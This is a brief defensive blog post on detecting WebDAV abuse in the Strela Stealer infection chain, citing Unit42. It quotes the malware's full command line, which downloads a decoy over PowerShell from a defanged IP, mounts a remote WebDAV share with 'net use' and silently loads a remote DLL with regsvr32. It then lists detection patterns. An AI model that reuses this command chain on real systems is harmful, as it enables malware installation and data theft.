043. Strela Stealer: Detecting WebDAV Abuse
Hello everyone! Have you ever seen adversaries use WebDAV servers to host malware? Yes, of course! So today we're going to look and detection opportunities related to such activity.
Let's look at recent Strela Stealer infection chain, presented by Unit42. The threat actors distributed the stealer through email attachments of zip archives containing JS files.
So, the JS file executes the following script:
cmd /c powershell.exe -Command "Invoke-WebRequest -OutFile %temp%\\invoice.pdf hxxp[:]//193.143.1[.]205/invoice.php" && start %temp%\\invoice.pdf && cmd /c net use \\\\193.143.1[.]205@8888\\davwwwroot\\ && cmd /c regsvr32 /s \\\\193.143.1[.]205@8888\\davwwwroot\\281681957614368.dll
Ok, the threat actors abuse PowerShell, but not for malware downloading, but to download and save a decoy document.
Next, the most interesting thing - using WebDAV. Here's what to look for:
- Execution of net with "use" and "davwwwroot" in the command line
- Execution of regsvr32 or rundll32 with "davwwwroot" in the command line
Quite easy, right?
See you tomorrow!
Comments
Post a Comment